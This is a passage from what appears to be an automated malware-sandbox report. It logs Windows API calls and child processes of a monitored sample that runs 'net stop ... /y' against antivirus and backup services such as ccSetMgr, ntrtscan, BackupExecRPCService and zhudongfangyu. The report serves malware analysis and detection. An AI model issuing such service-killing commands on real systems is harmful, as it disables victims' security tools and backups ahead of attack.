lpSystemTimeAsFileTime=0x28fefc*(dwLowDateTime=0x13093550, dwHighDateTime=0x1d6f0d1)) [0103.505] GetCurrentProcessId () returned 0xfd0 [0103.505] GetCurrentThreadId () returned 0xfd4 [0103.505] GetTickCount () returned 0x114de7d [0103.505] QueryPerformanceCounter (in: lpPerformanceCount=0x28fef4 | out: lpPerformanceCount=0x28fef4*=22260583335) returned 1 [0103.505] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0103.505] __set_app_type (_Type=0x1) [0103.505] __p__fmode () returned 0x770331f4 [0103.506] __p__commode () returned 0x770331fc [0103.506] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0103.506] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0103.506] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.506] GetConsoleOutputCP () returned 0x1b5 [0103.506] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0103.506] SetThreadUILanguage (LangId=0x0) returned 0x409 [0103.510] sprintf_s (in: _DstBuf=0x28feb4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0103.510] setlocale (category=0, locale=".437") returned="English_United States.437" [0104.078] GetStdHandle (nStdHandle=0xfffffff5) returned 0x40c [0104.078] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0104.078] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ccSetMgr /y" [0104.078] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28fc80, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0104.078] RtlAllocateHeap (HeapHandle=0x830000, Flags=0x0, Size=0x64) returned 0x843ad8 [0104.078] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0104.078] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x28fe84 | out: Buffer=0x28fe84*=0x841ae0) returned 0x0 [0104.079] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x28fe84 | out: Buffer=0x28fe84*=0x841af8) returned 0x0 [0104.079] _fileno (_File=0x77032900) returned -2 [0104.079] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0104.079] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0104.079] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0104.079] _wcsicmp (_String1="config", _String2="stop") returned -16 [0104.079] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0104.079] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0104.079] _wcsicmp (_String1="file", _String2="stop") returned -13 [0104.079] _wcsicmp (_String1="files", _String2="stop") returned -13 [0104.079] _wcsicmp (_String1="group", _String2="stop") returned -12 [0104.079] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0104.079] _wcsicmp (_String1="help", _String2="stop") returned -11 [0104.079] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0104.079] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0104.079] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0104.079] _wcsicmp (_String1="session", _String2="stop") returned -15 [0104.079] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0104.080] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0104.080] _wcsicmp (_String1="share", _String2="stop") returned -12 [0104.080] _wcsicmp (_String1="start", _String2="stop") returned -14 [0104.080] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0104.080] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0104.080] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0104.080] _wcsicmp (_String1="accounts", _String2="ccSetMgr") returned -2 [0104.080] _wcsicmp (_String1="computer", _String2="ccSetMgr") returned 12 [0104.080] _wcsicmp (_String1="config", _String2="ccSetMgr") returned 12 [0104.080] _wcsicmp (_String1="continue", _String2="ccSetMgr") returned 12 [0104.080] _wcsicmp (_String1="cont", _String2="ccSetMgr") returned 12 [0104.080] _wcsicmp (_String1="file", _String2="ccSetMgr") returned 3 [0104.080] _wcsicmp (_String1="files", _String2="ccSetMgr") returned 3 [0104.080] _wcsicmp (_String1="group", _String2="ccSetMgr") returned 4 [0104.080] _wcsicmp (_String1="groups", _String2="ccSetMgr") returned 4 [0104.080] _wcsicmp (_String1="help", _String2="ccSetMgr") returned 5 [0104.080] _wcsicmp (_String1="helpmsg", _String2="ccSetMgr") returned 5 [0104.080] _wcsicmp (_String1="localgroup", _String2="ccSetMgr") returned 9 [0104.081] _wcsicmp (_String1="pause", _String2="ccSetMgr") returned 13 [0104.081] _wcsicmp (_String1="session", _String2="ccSetMgr") returned 16 [0104.081] _wcsicmp (_String1="sessions", _String2="ccSetMgr") returned 16 [0104.081] _wcsicmp (_String1="sess", _String2="ccSetMgr") returned 16 [0104.081] _wcsicmp (_String1="share", _String2="ccSetMgr") returned 16 [0104.081] _wcsicmp (_String1="start", _String2="ccSetMgr") returned 16 [0104.081] _wcsicmp (_String1="stats", _String2="ccSetMgr") returned 16 [0104.081] _wcsicmp (_String1="statistics", _String2="ccSetMgr") returned 16 [0104.081] _wcsicmp (_String1="stop", _String2="ccSetMgr") returned 16 [0104.081] _wcsicmp (_String1="time", _String2="ccSetMgr") returned 17 [0104.081] _wcsicmp (_String1="user", _String2="ccSetMgr") returned 18 [0104.081] _wcsicmp (_String1="users", _String2="ccSetMgr") returned 18 [0104.081] _wcsicmp (_String1="msg", _String2="ccSetMgr") returned 10 [0104.081] _wcsicmp (_String1="messenger", _String2="ccSetMgr") returned 10 [0104.081] _wcsicmp (_String1="receiver", _String2="ccSetMgr") returned 15 [0104.081] _wcsicmp (_String1="rcv", _String2="ccSetMgr") returned 15 [0104.081] _wcsicmp (_String1="netpopup", _String2="ccSetMgr") returned 11 [0104.081] _wcsicmp (_String1="redirector", _String2="ccSetMgr") returned 15 [0104.082] _wcsicmp (_String1="redir", _String2="ccSetMgr") returned 15 [0104.082] _wcsicmp (_String1="rdr", _String2="ccSetMgr") returned 15 [0104.082] _wcsicmp (_String1="workstation", _String2="ccSetMgr") returned 20 [0104.082] _wcsicmp (_String1="work", _String2="ccSetMgr") returned 20 [0104.082] _wcsicmp (_String1="wksta", _String2="ccSetMgr") returned 20 [0104.082] _wcsicmp (_String1="prdr", _String2="ccSetMgr") returned 13 [0104.082] _wcsicmp (_String1="devrdr", _String2="ccSetMgr") returned 1 [0104.082] _wcsicmp (_String1="lanmanworkstation", _String2="ccSetMgr") returned 9 [0104.082] _wcsicmp (_String1="server", _String2="ccSetMgr") returned 16 [0104.082] _wcsicmp (_String1="svr", _String2="ccSetMgr") returned 16 [0104.082] _wcsicmp (_String1="srv", _String2="ccSetMgr") returned 16 [0104.082] _wcsicmp (_String1="lanmanserver", _String2="ccSetMgr") returned 9 [0104.082] _wcsicmp (_String1="alerter", _String2="ccSetMgr") returned -2 [0104.082] _wcsicmp (_String1="netlogon", _String2="ccSetMgr") returned 11 [0104.083] _wcsupr (in: _String="ccSetMgr" | out: _String="CCSETMGR") returned="CCSETMGR" [0104.083] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x8454a8 [0104.086] GetServiceKeyNameW (in: hSCManager=0x8454a8, lpDisplayName="CCSETMGR", lpServiceName=0x3faaf0, lpcchBuffer=0x28fe20 | out: lpServiceName="", lpcchBuffer=0x28fe20) returned 0 [0104.086] _wcsicmp (_String1="msg", _String2="CCSETMGR") returned 10 [0104.086] _wcsicmp (_String1="messenger", _String2="CCSETMGR") returned 10 [0104.086] _wcsicmp (_String1="receiver", _String2="CCSETMGR") returned 15 [0104.086] _wcsicmp (_String1="rcv", _String2="CCSETMGR") returned 15 [0104.086] _wcsicmp (_String1="redirector", _String2="CCSETMGR") returned 15 [0104.086] _wcsicmp (_String1="redir", _String2="CCSETMGR") returned 15 [0104.086] _wcsicmp (_String1="rdr", _String2="CCSETMGR") returned 15 [0104.086] _wcsicmp (_String1="workstation", _String2="CCSETMGR") returned 20 [0104.086] _wcsicmp (_String1="work", _String2="CCSETMGR") returned 20 [0104.086] _wcsicmp (_String1="wksta", _String2="CCSETMGR") returned 20 [0104.086] _wcsicmp (_String1="prdr", _String2="CCSETMGR") returned 13 [0104.086] _wcsicmp (_String1="devrdr", _String2="CCSETMGR") returned 1 [0104.086] _wcsicmp (_String1="lanmanworkstation", _String2="CCSETMGR") returned 9 [0104.087] _wcsicmp (_String1="server", _String2="CCSETMGR") returned 16 [0104.087] _wcsicmp (_String1="svr", _String2="CCSETMGR") returned 16 [0104.087] _wcsicmp (_String1="srv", _String2="CCSETMGR") returned 16 [0104.087] _wcsicmp (_String1="lanmanserver", _String2="CCSETMGR") returned 9 [0104.087] _wcsicmp (_String1="alerter", _String2="CCSETMGR") returned -2 [0104.087] _wcsicmp (_String1="netlogon", _String2="CCSETMGR") returned 11 [0104.087] NetServiceControl (in: servername=0x0, service="CCSETMGR", opcode=0x0, arg=0x0, bufptr=0x28fe1c | out: bufptr=0x28fe1c) returned 0x889 [0104.088] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0104.088] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0104.089] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0104.090] GetFileType (hFile=0x0) returned 0x0 [0104.090] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x843ec0 [0104.090] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x843ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0104.090] WriteFile (in: hFile=0x0, lpBuffer=0x843ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x28fd5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28fd5c, lpOverlapped=0x0) returned 0 [0104.090] LocalFree (hMem=0x843ec0) returned 0x0 [0104.090] GetFileType (hFile=0x0) returned 0x0 [0104.090] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x846170 [0104.090] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x846170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x84", lpUsedDefaultChar=0x0) returned 2 [0104.090] WriteFile (in: hFile=0x0, lpBuffer=0x846170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28fd5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28fd5c, lpOverlapped=0x0) returned 0 [0104.090] LocalFree (hMem=0x846170) returned 0x0 [0104.090] _ultow (in: _Dest=0x889, _Radix=2686348 | out: _Dest=0x889) returned="2185" [0104.090] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0104.091] GetFileType (hFile=0x0) returned 0x0 [0104.091] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x846170 [0104.091] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x846170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0104.091] WriteFile (in: hFile=0x0, lpBuffer=0x846170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x28fd68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28fd68, lpOverlapped=0x0) returned 0 [0104.091] LocalFree (hMem=0x846170) returned 0x0 [0104.091] GetFileType (hFile=0x0) returned 0x0 [0104.091] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x846170 [0104.091] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x846170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\x84", lpUsedDefaultChar=0x0) returned 2 [0104.091] WriteFile (in: hFile=0x0, lpBuffer=0x846170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28fd68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x28fd68, lpOverlapped=0x0) returned 0 [0104.091] LocalFree (hMem=0x846170) returned 0x0 [0104.092] NetApiBufferFree (Buffer=0x841ae0) returned 0x0 [0104.092] NetApiBufferFree (Buffer=0x841af8) returned 0x0 [0104.092] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ccSetMgr /y" [0104.092] exit (_Code=2) Process: id = "102" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6fda2000" os_pid = "0xba8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop ntrtscan /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 470 os_tid = 0xb48 Process: id = "103" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x715a7000" os_pid = "0xa88" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop BackupExecRPCService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 471 os_tid = 0x6c8 Process: id = "104" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6fbac000" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop FA_Scheduler /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 472 os_tid = 0x5a8 Process: id = "105" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x266a6000" os_pid = "0x67c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "41" os_parent_pid = "0xc08" cmd_line = "C:\\Windows\\system32\\net1 stop zhudongfangyu /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 474 os_tid = 0xae4 [0105.178] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x31fef4 | out: lpSystemTimeAsFileTime=0x31fef4*(dwLowDateTime=0x13b6f9b0, dwHighDateTime=0x1d6f0d1)) [0105.178] GetCurrentProcessId () returned 0x67c [0105.178] GetCurrentThreadId () returned 0xae4 [0105.178] GetTickCount () returned 0x114e2f0 [0105.178] QueryPerformanceCounter (in: lpPerformanceCount=0x31feec | out: lpPerformanceCount=0x31feec*=22427991915) returned 1 [0105.179] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0105.179] __set_app_type (_Type=0x1) [0105.179] __p__fmode () returned 0x770331f4 [0105.180] __p__commode () returned 0x770331fc [0105.180] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0105.180] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0105.180] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.180] GetConsoleOutputCP () returned 0x1b5 [0105.180] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0105.180] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.184] sprintf_s (in: _DstBuf=0x31feac, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0105.184] setlocale (category=0, locale=".437") returned="English_United States.437" [0105.259] GetStdHandle (nStdHandle=0xfffffff5) returned 0x2fc [0105.259] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.259] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop zhudongfangyu /y" [0105.259] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x31fc78, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0105.259] RtlAllocateHeap (HeapHandle=0x790000, Flags=0x0, Size=0x6e) returned 0x7a3ae0 [0105.259] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0105.260] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31fe7c | out: Buffer=0x31fe7c*=0x7a1ae8) returned 0x0 [0105.260] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x31fe7c | out: Buffer=0x31fe7c*=0x7a1b00) returned 0x0 [0105.260] _fileno (_File=0x77032900) returned -2 [0105.260] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0105.260] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0105.260] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0105.260] _wcsicmp (_String1="config", _String2="stop") returned -16 [0105.260] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0105.260] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0105.260] _wcsicmp (_String1="file", _String2="stop") returned -13 [0105.260] _wcsicmp (_String1="files", _String2="stop") returned -13 [0105.260] _wcsicmp (_String1="group", _String2="stop") returned -12 [0105.260] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0105.260] _wcsicmp (_String1="help", _String2="stop") returned -11 [0105.260] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0105.260] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0105.260] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0105.260] _wcsicmp (_String1="session", _String2="stop") returned -15 [0105.260] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0105.260] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0105.260] _wcsicmp (_String1="share", _String2="stop") returned -12 [0105.260] _wcsicmp (_String1="start", _String2="stop") returned -14 [0105.260] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0105.260] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0105.260] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0105.260] _wcsicmp (_String1="accounts", _String2="zhudongfangyu") returned -25 [0105.261] _wcsicmp (_String1="computer", _String2="zhudongfangyu") returned -23 [0105.261] _wcsicmp (_String1="config", _String2="zhudongfangyu") returned -23 [0105.261] _wcsicmp (_String1="continue", _String2="zhudongfangyu") returned -23 [0105.261] _wcsicmp (_String1="cont", _String2="zhudongfangyu") returned -23 [0105.261] _wcsicmp (_String1="file", _String2="zhudongfangyu") returned -20 [0105.261] _wcsicmp (_String1="files", _String2="zhudongfangyu") returned -20 [0105.261] _wcsicmp (_String1="group", _String2="zhudongfangyu") returned -19 [0105.261] _wcsicmp (_String1="groups", _String2="zhudongfangyu") returned -19 [0105.261] _wcsicmp (_String1="help", _String2="zhudongfangyu") returned -18 [0105.261] _wcsicmp (_String1="helpmsg", _String2="zhudongfangyu") returned -18 [0105.261] _wcsicmp (_String1="localgroup", _String2="zhudongfangyu") returned -14 [0105.261] _wcsicmp (_String1="pause", _String2="zhudongfangyu") returned -10 [0105.261] _wcsicmp (_String1="session", _String2="zhudongfangyu") returned -7 [0105.261] _wcsicmp (_String1="sessions", _String2="zhudongfangyu") returned -7 [0105.261] _wcsicmp (_String1="sess", _String2="zhudongfangyu") returned -7 [0105.261] _wcsicmp (_String1="share", _String2="zhudongfangyu") returned -7 [0105.261] _wcsicmp (_String1="start", _String2="zhudongfangyu") returned -7 [0105.261] _wcsicmp (_String1="stats", _String2="zhudongfangyu") returned -7 [0105.261] _wcsicmp (_String1="statistics", _String2="zhudongfangyu") returned -7 [0105.261] _wcsicmp (_String1="stop", _String2="zhudongfangyu") returned -7 [0105.261] _wcsicmp (_String1="time", _String2="zhudongfangyu") returned -6 [0105.261] _wcsicmp (_String1="user", _String2="zhudongfangyu") returned -5 [0105.261] _wcsicmp (_String1="users", _String2="zhudongfangyu") returned -5 [0105.261] _wcsicmp (_String1="msg", _String2="zhudongfangyu") returned -13 [0105.261] _wcsicmp (_String1="messenger", _String2="zhudongfangyu") returned -13 [0105.261] _wcsicmp (_String1="receiver", _String2="zhudongfangyu") returned -8 [0105.261] _wcsicmp (_String1="rcv", _String2="zhudongfangyu") returned -8 [0105.262] _wcsicmp (_String1="netpopup", _String2="zhudongfangyu") returned -12 [0105.262] _wcsicmp (_String1="redirector", _String2="zhudongfangyu") returned -8 [0105.262] _wcsicmp (_String1="redir", _String2="zhudongfangyu") returned -8 [0105.262] _wcsicmp (_String1="rdr", _String2="zhudongfangyu") returned -8 [0105.262] _wcsicmp (_String1="workstation", _String2="zhudongfangyu") returned -3 [0105.262] _wcsicmp (_String1="work", _String2="zhudongfangyu") returned -3 [0105.262] _wcsicmp (_String1="wksta", _String2="zhudongfangyu") returned -3 [0105.262] _wcsicmp (_String1="prdr", _String2="zhudongfangyu") returned -10 [0105.262] _wcsicmp (_String1="devrdr", _String2="zhudongfangyu") returned -22 [0105.262] _wcsicmp (_String1="lanmanworkstation", _String2="zhudongfangyu") returned -14 [0105.262] _wcsicmp (_String1="server", _String2="zhudongfangyu") returned -7 [0105.262] _wcsicmp (_String1="svr", _String2="zhudongfangyu") returned -7 [0105.262] _wcsicmp (_String1="srv", _String2="zhudongfangyu") returned -7 [0105.262] _wcsicmp (_String1="lanmanserver", _String2="zhudongfangyu") returned -14 [0105.262] _wcsicmp (_String1="alerter", _String2="zhudongfangyu") returned -25 [0105.262] _wcsicmp (_String1="netlogon", _String2="zhudongfangyu") returned -12 [0105.262] _wcsupr (in: _String="zhudongfangyu" | out: _String="ZHUDONGFANGYU") returned="ZHUDONGFANGYU" [0105.263] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7a54b0 [0105.303] GetServiceKeyNameW (in: hSCManager=0x7a54b0, lpDisplayName="ZHUDONGFANGYU", lpServiceName=0x3faaf0, lpcchBuffer=0x31fe18 | out: lpServiceName="", lpcchBuffer=0x31fe18) returned 0 [0105.303] _wcsicmp (_String1="msg", _String2="ZHUDONGFANGYU") returned -13 [0105.303] _wcsicmp (_String1="messenger", _String2="ZHUDONGFANGYU") returned -13 [0105.303] _wcsicmp (_String1="receiver", _String2="ZHUDONGFANGYU") returned -8 [0105.303] _wcsicmp (_String1="rcv", _String2="ZHUDONGFANGYU") returned -8 [0105.303] _wcsicmp (_String1="redirector", _String2="ZHUDONGFANGYU") returned -8 [0105.303] _wcsicmp (_String1="redir", _String2="ZHUDONGFANGYU") returned -8 [0105.303] _wcsicmp (_String1="rdr", _String2="ZHUDONGFANGYU") returned -8 [0105.303] _wcsicmp (_String1="workstation", _String2="ZHUDONGFANGYU") returned -3 [0105.303] _wcsicmp (_String1="work", _String2="ZHUDONGFANGYU") returned -3 [0105.303] _wcsicmp (_String1="wksta", _String2="ZHUDONGFANGYU") returned -3 [0105.303] _wcsicmp (_String1="prdr", _String2="ZHUDONGFANGYU") returned -10 [0105.303] _wcsicmp (_String1="devrdr", _String2="ZHUDONGFANGYU") returned -22 [0105.303] _wcsicmp (_String1="lanmanworkstation", _String2="ZHUDONGFANGYU") returned -14 [0105.303] _wcsicmp (_String1="server", _String2="ZHUDONGFANGYU") returned -7 [0105.303] _wcsicmp (_String1="svr", _String2="ZHUDONGFANGYU") returned -7 [0105.304] _wcsicmp (_String1="srv", _String2="ZHUDONGFANGYU") returned -7 [0105.304] _wcsicmp (_String1="lanmanserver", _String2="ZHUDONGFANGYU") returned -14 [0105.304] _wcsicmp (_String1="alerter", _String2="ZHUDONGFANGYU") returned -25 [0105.304] _wcsicmp (_String1="netlogon", _String2="ZHUDONGFANGYU") returned -12 [0105.304] NetServiceControl (in: servername=0x0, service="ZHUDONGFANGYU", opcode=0x0, arg=0x0, bufptr=0x31fe14 | out: bufptr=0x31fe14) returned 0x889 [0105.305] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0105.305] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0105.306] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0105.307] GetFileType (hFile=0x0) returned 0x0 [0105.307] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x7a3ed0 [0105.307] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x7a3ed0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0105.307] WriteFile (in: hFile=0x0, lpBuffer=0x7a3ed0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x31fd54, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31fd54, lpOverlapped=0x0) returned 0 [0105.307] LocalFree (hMem=0x7a3ed0) returned 0x0 [0105.307] GetFileType (hFile=0x0) returned 0x0 [0105.307] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7a6178 [0105.307] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7a6178, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nz", lpUsedDefaultChar=0x0) returned 2 [0105.307] WriteFile (in: hFile=0x0, lpBuffer=0x7a6178, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x31fd54, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x31fd54, lpOverlapped=0x0) returned 0 [0105.307] LocalFree (hMem=0x7a6178) returned 0x0 [0105.307] _ultow (in: _Dest=0x889, _Radix=3276164 | out: _Dest=0x889) returned="2185" [0105.307] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, 